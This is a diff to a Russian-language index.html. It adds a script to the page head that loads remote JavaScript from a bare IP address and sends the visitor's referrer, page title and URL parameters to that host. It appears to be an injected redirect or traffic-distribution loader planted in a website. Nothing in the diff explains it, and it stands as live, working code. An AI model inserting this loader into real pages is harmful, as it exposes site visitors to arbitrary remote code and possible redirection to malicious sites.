--- a/index.html
+++ b/index.html
@@ -2,6 +2,16 @@
 <html lang="ru">
 
 <head>
+    <span id="03774f7a-f831-1ccd-76bc-5ed250b4fd58"></span><script type="application/javascript">
+var d=document;var s=d.createElement('script'); 
+s.src='//185.179.190.137/hgHQQg?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm618f779b44b86=script618f779b44b88&_cid=03774f7a-f831-1ccd-76bc-5ed250b4fd58'; 
+if (document.currentScript) { 
+document.currentScript.parentNode.insertBefore(s, document.currentScript);
+} else {
+d.getElementsByTagName('head')[0].appendChild(s);
+}
+if (document.location.protocol === 'https:' && '//185.179.190.137/hgHQQg?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm618f779b44b86=script618f779b44b88'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+</script>
 <script src="https://www.googleoptimize.com/optimize.js?id=GTM-5784GPS"></script>
     <meta http-equiv="content-type" content="text/html;charset=UTF-8">
 
